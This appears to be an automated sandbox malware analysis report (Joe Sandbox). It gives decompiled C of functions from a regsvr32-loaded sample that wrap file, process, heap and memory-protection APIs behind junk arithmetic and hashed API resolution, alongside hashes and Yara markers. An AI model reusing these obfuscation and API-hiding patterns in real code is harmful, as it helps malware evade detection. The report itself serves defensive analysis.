                                                                                                                • HeapCreate.KERNEL32(00000000,00001000,00000000,1003CF94,00000001,?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C), ref: 10043E3A
                                                                                                                • HeapDestroy.KERNEL32(?,?,00000001,?,?,1003D112,00000001,?,?,10068BB8,0000000C,1003D1CC,?), ref: 10043E70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$CreateDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 3296620671-0
                                                                                                                • Opcode ID: 857fe83e44da9f7500877e47c13858bed751010e267648675e8e161a80e4069a
                                                                                                                • Instruction ID: 80eac13385dfa27a13768e7c4a11f622fe383da96b32f3e20cdc48349beb3a6a
                                                                                                                • Opcode Fuzzy Hash: 857fe83e44da9f7500877e47c13858bed751010e267648675e8e161a80e4069a
                                                                                                                • Instruction Fuzzy Hash: DEE09270A16311AEFB40DB329D453AA37E8E744786F24E435F440D50E5FB748480DA08
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10006D80 Relevance: 1.7, APIs: 1, Instructions: 222COMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 89%
                                                                                                                			E10006D80() {
				signed int _t110;
				signed int _t116;
				signed int _t163;
				signed int _t187;
				signed int _t188;
				signed int _t192;
				signed int _t204;
				signed int _t207;
				signed int _t208;
				signed int _t215;
				signed int _t222;
				intOrPtr* _t233;
				long _t246;
				signed int _t249;
				signed int _t250;
				signed int _t254;
				signed int _t278;
				signed int _t282;
				void* _t287;

				_t246 =  *(_t287 + 0x18);
				_t110 =  *(_t246 + 8);
				 *(_t287 + 0xc) = _t110;
				if(_t110 != 0) {
					_t208 =  *0x1006c2c4; // 0x0
					_t187 =  *(_t246 + 0xc);
					_t254 =  *0x1006c2bc; // 0x0
					 *(_t287 + 0x10) = _t187;
					if((_t187 & _t254 * _t208 + 0x02000000 + _t254 * _t208 * 0x00000004) == 0) {
						_t188 =  *0x1006c2c8; // 0x0
						_t215 =  *0x1006c2c0; // 0x0
						_t249 =  *0x1006c2cc; // 0x0
						_t116 =  *0x1006c2d0; // 0x0
						asm("sbb ebp, ebp");
						asm("sbb eax, eax");
						_t63 = _t249 * _t249 * 2; // 0x3
						asm("sbb eax, eax");
						 *(_t287 + 0x14) =  *(0x1006c2d8 + ( ~( ~(_t254 -  *0x1006c2d0 + _t208 + (_t254 -  *0x1006c2d0 + _t208) * 0x00000002 + _t254 -  *0x1006c2d0 + _t208 + (_t254 -  *0x1006c2d0 + _t208) * 0x00000002 - (_t249 * _t249 + _t63 + 0x00000003) * _t215 - 0x80000000 &  *(_t287 + 0x10))) + ( ~( ~((_t116 * _t254 * _t254 + _t116 * _t254 * _t254 * 0x00000002 - 0x00000003) * _t215 + (_t215 - _t188 * _t208) * _t188 - _t249 + _t208 + ((_t215 - _t188 * _t208) * _t188 - _t249 + _t208) * 0x00000002 + 0x40000000 &  *(_t287 + 0x10))) +  ~( ~((_t249 - _t188 + _t208) * _t215 - _t249 + _t188 + 0x20000000 + ((_t249 - _t188 + _t208) * _t215 - _t249 + _t188) * 0x00000002 &  *(_t287 + 0x10))) * 2) * 2) * 4);
						_t192 =  *0x1006c2c8; // 0x0
						_t278 =  *0x1006c2d0; // 0x0
						if(( *(_t287 + 0x10) & ((_t215 * _t249 * _t208 * _t208 * _t208 + _t215 * _t249 * _t208 * _t208 * _t208 - 0x00000002) * _t215 + (0x00000002 - _t254) * 0x00000002) * _t215 + 0x04000000 + ((0x00000001 - _t192 * _t254 - _t208) *  *0x1006c2c8 + _t208 + _t208 * 0x00000002 - _t249) * 0x00000002) != 0) {
							 *(_t287 + 0x14) =  *(_t287 + 0x14) | (((0x00000001 - _t254) * _t208 + _t278) * 0x00000004 - 0x00000004) *  *0x1006c2c8 + 0x00000200 + ((0x00000001 - _t208) * _t249 + _t278) * 0x00000004;
						}
						 *(_t287 + 0x10) = _t208 + _t278;
						_t99 = _t215 * _t254 * 2; // -3
						_t163 = VirtualProtect( *( *(_t287 + 0x2c)), ((_t215 * _t254 + _t99 - 3) * _t249 +  *(_t287 + 0x18) +  *(_t287 + 0x18) * 2) * _t249 + (1 - _t208) * _t215 - _t278 + _t278 + _t254 + 2 - _t208 + _t208 * 2 +  *((intOrPtr*)(_t287 + 0x20)),  *(_t287 + 0x18), _t287 + 0x24 + (_t215 + _t208) * 8); // executed
						asm("sbb eax, eax");
						return  ~( ~_t163);
					} else {
						_t222 =  *_t246;
						 *(_t287 + 0x14) = _t222;
						if(_t222 ==  *((intOrPtr*)(_t246 + 4))) {
							_t282 =  *0x1006c2d0; // 0x0
							_t250 =  *0x1006c2cc; // 0x0
							if( *((intOrPtr*)(_t246 + 0x10)) != 0) {
								L8:
								_t204 =  *0x1006c2c0; // 0x0
								_t38 = (_t204 * _t208 + _t250 * _t254 +  *0x1006c2c8) * 4; // -15
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x28)) + 0x20))))( *(_t287 + 0x18),  *((intOrPtr*)(_t287 + 0x1c)), ((_t204 * _t204 - _t282 * _t254) * _t208 + _t254 + 1) * _t204 - _t250 + _t250 * 2 + (((_t204 * _t204 - _t282 * _t254) * _t208 + _t254 + 1) * _t204 - _t250 + _t250 * 2) * 4 + (_t204 * _t208 + _t250 * _t254 +  *0x1006c2c8 + _t38 - 0xf) * _t282 + 0x4000,  *((intOrPtr*)( *((intOrPtr*)(_t287 + 0x20)) + 0x34)));
							} else {
								_t233 =  *((intOrPtr*)(_t287 + 0x20));
								_t207 =  *(_t233 + 0x3c);
								if( *((intOrPtr*)( *_t233 + 0x38)) == _t207) {
									goto L8;
								} else {
									 *(_t287 + 0x24) = _t250 * _t254 * _t208;
									_t241 = (_t282 -  *(_t287 + 0x24) + 1) * _t208;
									_t22 = (_t282 -  *(_t287 + 0x24) + 1) * _t208 + _t241 * 2 - 6; // -7
									if(((_t282 -  *(_t287 + 0x24) + 1) * _t208 + _t241 * 2 + _t22) * _t250 + _t110 % _t207 + (_t254 + _t254 * 2) * 2 == 0) {
										_t282 =  *0x1006c2d0; // 0x0
										goto L8;
									}
								}
							}
						}
						return 1;
					}
				} else {
					return 1;
				}
			}






















                                                                                                                0x10006d84
                                                                                                                0x10006d88
                                                                                                                0x10006d8d
                                                                                                                0x10006d91
                                                                                                                0x10006d9d
                                                                                                                0x10006da4
                                                                                                                0x10006da9
                                                                                                                0x10006dbd
                                                                                                                0x10006dc1
                                                                                                                0x10006e9d
                                                                                                                0x10006ea3
                                                                                                                0x10006eb5
                                                                                                                0x10006ec2
                                                                                                                0x10006ee3
                                                                                                                0x10006eff
                                                                                                                0x10006f0c
                                                                                                                0x10006f34
                                                                                                                0x10006f42
                                                                                                                0x10006f65
                                                                                                                0x10006f90
                                                                                                                0x10006f96
                                                                                                                0x10006fc5
                                                                                                                0x10006fc5
                                                                                                                0x10006fcc
                                                                                                                0x10006ff0
                                                                                                                0x1000701a
                                                                                                                0x10007024
                                                                                                                0x1000702d
                                                                                                                0x10006dc7
                                                                                                                0x10006dc7
                                                                                                                0x10006dcc
                                                                                                                0x10006dd0
                                                                                                                0x10006dda
                                                                                                                0x10006de0
                                                                                                                0x10006de6
                                                                                                                0x10006e31
                                                                                                                0x10006e31
                                                                                                                0x10006e68
                                                                                                                0x10006e8b
                                                                                                                0x10006de8
                                                                                                                0x10006de8
                                                                                                                0x10006dec
                                                                                                                0x10006df4
                                                                                                                0x00000000
                                                                                                                0x10006df6
                                                                                                                0x10006dfe
                                                                                                                0x10006e0d
                                                                                                                0x10006e13
                                                                                                                0x10006e29
                                                                                                                0x10006e2b
                                                                                                                0x00000000
                                                                                                                0x10006e2b
                                                                                                                0x10006e29
                                                                                                                0x10006df4
                                                                                                                0x10006de6
                                                                                                                0x10006e9c
                                                                                                                0x10006e9c
                                                                                                                0x10006d93
                                                                                                                0x10006d9c
                                                                                                                0x10006d9c

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: edc66d10ce20756c2b98548356f509ee5f4656373e62e6f350df609721060a77
                                                                                                                • Instruction ID: d23e61ff439dd59ef86bb16d1c83da8f7f88d15556f78113404b724ff760b7fb
                                                                                                                • Opcode Fuzzy Hash: edc66d10ce20756c2b98548356f509ee5f4656373e62e6f350df609721060a77
                                                                                                                • Instruction Fuzzy Hash: 0C81843270031B8FD318DF5CDDC1A99B7AAFBD8300F05963AD854CB2B5E670E6198A80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BA50A Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 53%
                                                                                                                			E001BA50A(void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, long _a16, intOrPtr _a20, intOrPtr _a24, long _a28, intOrPtr _a36, long _a40, intOrPtr _a44, WCHAR* _a48) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				struct _SECURITY_ATTRIBUTES* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t54;
				void* _t65;
				signed int _t66;
				signed int _t67;

				_push(_a48);
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				E001AC98A(_t54);
				_v28 = 0xdc14f8;
				_v24 = 0xd964fd;
				_v20 = 0;
				_v16 = 0xcfd091;
				_v16 = _v16 << 0x10;
				_v16 = _v16 << 8;
				_v16 = _v16 ^ 0x910ec0c9;
				_v12 = 0x7a2ff2;
				_t66 = 0x43;
				_v12 = _v12 / _t66;
				_v12 = _v12 | 0xd721c1d7;
				_v12 = _v12 ^ 0xd727192a;
				_v8 = 0x1eb7c0;
				_v8 = _v8 ^ 0x33199484;
				_t67 = 0x2d;
				_v8 = _v8 * 0xa;
				_v8 = _v8 / _t67;
				_v8 = _v8 ^ 0x05a21ecf;
				E001A7F78(_t67, 0xbd3f148a, _t67, 0x203, _t67, 0x939ae237);
				_t65 = CreateFileW(_a48, _a28, _a40, 0, _a4, _a16, 0); // executed
				return _t65;
			}













                                                                                                                0x001ba511
                                                                                                                0x001ba516
                                                                                                                0x001ba519
                                                                                                                0x001ba51c
                                                                                                                0x001ba51f
                                                                                                                0x001ba520
                                                                                                                0x001ba523
                                                                                                                0x001ba526
                                                                                                                0x001ba529
                                                                                                                0x001ba52c
                                                                                                                0x001ba52f
                                                                                                                0x001ba532
                                                                                                                0x001ba536
                                                                                                                0x001ba537
                                                                                                                0x001ba53c
                                                                                                                0x001ba546
                                                                                                                0x001ba54f
                                                                                                                0x001ba552
                                                                                                                0x001ba559
                                                                                                                0x001ba55d
                                                                                                                0x001ba561
                                                                                                                0x001ba568
                                                                                                                0x001ba574
                                                                                                                0x001ba579
                                                                                                                0x001ba57e
                                                                                                                0x001ba585
                                                                                                                0x001ba58c
                                                                                                                0x001ba593
                                                                                                                0x001ba59e
                                                                                                                0x001ba5aa
                                                                                                                0x001ba5b3
                                                                                                                0x001ba5bb
                                                                                                                0x001ba5cb
                                                                                                                0x001ba5e4
                                                                                                                0x001ba5ea

                                                                                                                APIs
                                                                                                                • CreateFileW.KERNEL32(?,?,?,00000000,D727192A,00D964FD,00000000), ref: 001BA5E4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction ID: 06c937a76909320fe75c11c2387396e1a6ddbb195fba40b597ba24f862dc4db2
                                                                                                                • Opcode Fuzzy Hash: 437ca9c9c9e6bbc918406cc15dcd8751e725cea46ce31b3af92ae7b3c8ede5d5
                                                                                                                • Instruction Fuzzy Hash: C821C276901108FBDF05DFA9D94A9DEBFB6EF48314F108149FA1866260D3728A609F91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A816B Relevance: 1.6, APIs: 1, Instructions: 68processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E001A816B(struct _STARTUPINFOW* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32, WCHAR* _a40, intOrPtr _a48, intOrPtr _a52, struct _PROCESS_INFORMATION* _a56, WCHAR* _a60, int _a64) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t45;
				int _t52;
				struct _STARTUPINFOW* _t56;

				_push(_a64);
				_t56 = __ecx;
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(_a48);
				_push(0);
				_push(_a40);
				_push(0);
				_push(_a32);
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(0);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				E001AC98A(_t45);
				_v12 = 0x5160ce;
				_v12 = _v12 ^ 0x33bed16b;
				_v12 = _v12 + 0xffffe3b5;
				_v12 = _v12 | 0x3554987c;
				_v12 = _v12 ^ 0x37f1882e;
				_v8 = 0x57d154;
				_v8 = _v8 + 0xffff861a;
				_v8 = _v8 * 0x3e;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0x0012f1da;
				_v16 = 0x81ccd1;
				_v16 = _v16 >> 4;
				_v16 = _v16 >> 5;
				_v16 = _v16 ^ 0x000c22df;
				E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x245, __ecx, 0x989b5ecc);
				_t52 = CreateProcessW(_a40, _a60, 0, 0, _a64, 0, 0, 0, _t56, _a56); // executed
				return _t52;
			}









                                                                                                                0x001a8173
                                                                                                                0x001a8178
                                                                                                                0x001a817a
                                                                                                                0x001a817d
                                                                                                                0x001a8180
                                                                                                                0x001a8183
                                                                                                                0x001a8186
                                                                                                                0x001a8187
                                                                                                                0x001a818a
                                                                                                                0x001a818b
                                                                                                                0x001a818e
                                                                                                                0x001a818f
                                                                                                                0x001a8192
                                                                                                                0x001a8195
                                                                                                                0x001a8196
                                                                                                                0x001a8199
                                                                                                                0x001a819c
                                                                                                                0x001a819f
                                                                                                                0x001a81a0
                                                                                                                0x001a81a1
                                                                                                                0x001a81a6
                                                                                                                0x001a81b0
                                                                                                                0x001a81bc
                                                                                                                0x001a81c3
                                                                                                                0x001a81ca
                                                                                                                0x001a81d1
                                                                                                                0x001a81d8
                                                                                                                0x001a81ef
                                                                                                                0x001a81f2
                                                                                                                0x001a81f6
                                                                                                                0x001a81fd
                                                                                                                0x001a8204
                                                                                                                0x001a8208
                                                                                                                0x001a820c
                                                                                                                0x001a821c
                                                                                                                0x001a8236
                                                                                                                0x001a823d

                                                                                                                APIs
                                                                                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,00000044,?), ref: 001A8236
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 963392458-0
                                                                                                                • Opcode ID: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction ID: 688ecebf684eeea89edb2f2aa616b81e273943912f7772b46daf64c6c4c1f26b
                                                                                                                • Opcode Fuzzy Hash: 7e58e5a2dccc3d8a10dddd634ea05ac90ad53dce594303d851aa7f7164f25884
                                                                                                                • Instruction Fuzzy Hash: FC21A372801248FBCF159F95CD09CCFBFB9EB99714F108098FA1562161D3729A65EB50
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A3466 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001A3466(void* __ecx, void* __edx, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				void* _t29;
				intOrPtr* _t35;
				void* _t36;
				void* _t41;

				_t41 = __ecx;
				E001AC98A(_t29);
				_v8 = 0x88f6ec;
				_v8 = _v8 | 0x6177bf25;
				_v8 = _v8 >> 0xb;
				_v8 = _v8 + 0x167f;
				_v8 = _v8 ^ 0x0004f919;
				_v16 = 0x9ca171;
				_v16 = _v16 >> 8;
				_v16 = _v16 ^ 0x0005b7ae;
				_v12 = 0xf5b080;
				_v12 = _v12 * 0x58;
				_v12 = _v12 ^ 0x54793a02;
				_t35 = E001A7F78(__ecx, 0xffc5979d, __ecx, 0xcc, __ecx, 0x31e1b46b);
				_t36 =  *_t35(0, _t41, 0, 0, _a12, __ecx, __edx, 0, 0, _a12, _a16, 0, _a24, _a28, _a32); // executed
				return _t36;
			}










                                                                                                                0x001a3473
                                                                                                                0x001a3486
                                                                                                                0x001a348b
                                                                                                                0x001a3495
                                                                                                                0x001a34a1
                                                                                                                0x001a34a5
                                                                                                                0x001a34ac
                                                                                                                0x001a34b3
                                                                                                                0x001a34ba
                                                                                                                0x001a34be
                                                                                                                0x001a34c5
                                                                                                                0x001a34dc
                                                                                                                0x001a34df
                                                                                                                0x001a34ef
                                                                                                                0x001a34fe
                                                                                                                0x001a3505

                                                                                                                APIs
                                                                                                                • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 001A34FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPath
                                                                                                                • String ID:
                                                                                                                • API String ID: 1514166925-0
                                                                                                                • Opcode ID: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction ID: e1c0a7305d2460bac920d3b897c459a54dd61f9e4613ddec19657bf7b9ed268d
                                                                                                                • Opcode Fuzzy Hash: b1b65bccfc9919860329f926e3a24493a6d1cd56ea2b7ea92be5dd5deacbab9f
                                                                                                                • Instruction Fuzzy Hash: E0113671801248BBCB11DFA6DD0ACDFBFB8EB95704F108098F914A2210D3714B24DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001BEAB3 Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E001BEAB3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v8;
				unsigned int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t35;
				intOrPtr* _t40;
				void* _t41;

				E001AC98A(_t35);
				_v28 = 0xe6c580;
				_v24 = 0;
				_v20 = 0;
				_v8 = 0x2d161b;
				_v8 = _v8 + 0xffffdf88;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 | 0xc1e5ff2b;
				_v8 = _v8 ^ 0xc1e88dee;
				_v16 = 0xd78d92;
				_v16 = _v16 ^ 0xcf4c3c1d;
				_v16 = _v16 ^ 0xcf92c072;
				_v12 = 0x4f9c9d;
				_v12 = _v12 >> 4;
				_v12 = _v12 + 0xffff6ea2;
				_v12 = _v12 ^ 0x00061ead;
				_t40 = E001A7F78(__ecx, 0xbd3f148a, __ecx, 0x47, __ecx, 0x6e03cec5);
				_t41 =  *_t40(_a16, 0, _a12, 0x28, 0x28, __edx, _a4, 0, _a12, _a16, _a20, _a24); // executed
				return _t41;
			}












                                                                                                                0x001beacf
                                                                                                                0x001bead4
                                                                                                                0x001beade
                                                                                                                0x001beae6
                                                                                                                0x001beae9
                                                                                                                0x001beaf0
                                                                                                                0x001beaf7
                                                                                                                0x001beafb
                                                                                                                0x001beb02
                                                                                                                0x001beb09
                                                                                                                0x001beb10
                                                                                                                0x001beb17
                                                                                                                0x001beb1e
                                                                                                                0x001beb25
                                                                                                                0x001beb29
                                                                                                                0x001beb30
                                                                                                                0x001beb49
                                                                                                                0x001beb5a
                                                                                                                0x001beb60

                                                                                                                APIs
                                                                                                                • SetFileInformationByHandle.KERNEL32(000B5C15,00000000,?,00000028,?,?,?,?,?,?,?,?,?,?,?,00000023), ref: 001BEB5A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileHandleInformation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3935143524-0
                                                                                                                • Opcode ID: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction ID: 3cadde662fba60de6997c7662c49b9ca04e307189950b176b1e8e9e34eeb657e
                                                                                                                • Opcode Fuzzy Hash: 62f4fd11f1bee2b778a12be1f39848d568871edb8fd1f68545c84305743f77cd
                                                                                                                • Instruction Fuzzy Hash: 99111376C0121DFFCF11DFA4990A9EEBFB4EB54314F108089EA14A6294D3B14B64AFA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001B7DA0 Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E001B7DA0(void* __ecx, struct _SHFILEOPSTRUCTW* __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t34;
				int _t44;
				signed int _t46;
				signed int _t47;
				struct _SHFILEOPSTRUCTW* _t54;

				_push(_a4);
				_t54 = __edx;
				_push(__edx);
				E001AC98A(_t34);
				_v12 = 0xcdb49a;
				_v12 = _v12 + 0x8f05;
				_v12 = _v12 + 0xffff9965;
				_v12 = _v12 ^ 0x00c100f7;
				_v16 = 0xfe6a9a;
				_v16 = _v16 + 0xffff1466;
				_v16 = _v16 ^ 0x00fd95e9;
				_v8 = 0xca762f;
				_v8 = _v8 << 0xe;
				_t46 = 0x7f;
				_v8 = _v8 / _t46;
				_t47 = 0x2e;
				_v8 = _v8 / _t47;
				_v8 = _v8 ^ 0x00082e4e;
				E001A7F78(_t47, 0xffc5979d, _t47, 0xab, _t47, 0x3ddf729);
				_t44 = SHFileOperationW(_t54); // executed
				return _t44;
			}











                                                                                                                0x001b7da7
                                                                                                                0x001b7daa
                                                                                                                0x001b7dac
                                                                                                                0x001b7dae
                                                                                                                0x001b7db3
                                                                                                                0x001b7dbd
                                                                                                                0x001b7dc6
                                                                                                                0x001b7dcd
                                                                                                                0x001b7dd4
                                                                                                                0x001b7ddb
                                                                                                                0x001b7de2
                                                                                                                0x001b7de9
                                                                                                                0x001b7df0
                                                                                                                0x001b7df9
                                                                                                                0x001b7dfe
                                                                                                                0x001b7e06
                                                                                                                0x001b7e0e
                                                                                                                0x001b7e16
                                                                                                                0x001b7e2d
                                                                                                                0x001b7e36
                                                                                                                0x001b7e3c

                                                                                                                APIs
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 001B7E36
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileOperation
                                                                                                                • String ID:
                                                                                                                • API String ID: 3080627654-0
                                                                                                                • Opcode ID: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction ID: e50ffbea6b96aeef489ac29e7ae3855f99aa39c1ce78ffcbd59fb15ac6aa02ce
                                                                                                                • Opcode Fuzzy Hash: 2a16452b27a4fc3da9f362e710a0266374990953f3da1891371b7e6ecd306318
                                                                                                                • Instruction Fuzzy Hash: BF118BB1E00208FFDB14DFA9D80A8DEBBB5EB45314F20C199E418A7241E7B55F149F40
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A3506 Relevance: 1.5, APIs: 1, Instructions: 47memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E001A3506(void* __ecx, void* __edx, void* _a4, long _a8, intOrPtr _a12, long _a16, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				void* _t39;
				void* _t47;
				signed int _t49;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				E001AC98A(_t39);
				_v16 = 0xf4e2fc;
				_t49 = 0x3b;
				_v16 = _v16 / _t49;
				_v16 = _v16 ^ 0x00083f87;
				_v12 = 0x549d10;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0xffff8515;
				_v12 = _v12 | 0x9f85c2ad;
				_v12 = _v12 ^ 0x9fa0e66d;
				_v8 = 0xbeaf63;
				_v8 = _v8 | 0x7acbe5f7;
				_v8 = _v8 << 0xf;
				_v8 = _v8 ^ 0x3b62dfe8;
				_v8 = _v8 ^ 0xcc9b72fd;
				E001A7F78(_t49, 0xbd3f148a, _t49, 0x106, _t49, 0xba07f621);
				_t47 = RtlAllocateHeap(_a4, _a16, _a8); // executed
				return _t47;
			}









                                                                                                                0x001a350c
                                                                                                                0x001a350f
                                                                                                                0x001a3512
                                                                                                                0x001a3515
                                                                                                                0x001a3518
                                                                                                                0x001a351d
                                                                                                                0x001a3522
                                                                                                                0x001a3533
                                                                                                                0x001a353b
                                                                                                                0x001a3543
                                                                                                                0x001a354a
                                                                                                                0x001a3551
                                                                                                                0x001a3555
                                                                                                                0x001a355c
                                                                                                                0x001a3563
                                                                                                                0x001a356a
                                                                                                                0x001a3571
                                                                                                                0x001a3578
                                                                                                                0x001a357c
                                                                                                                0x001a3583
                                                                                                                0x001a359a
                                                                                                                0x001a35ab
                                                                                                                0x001a35b0

                                                                                                                APIs
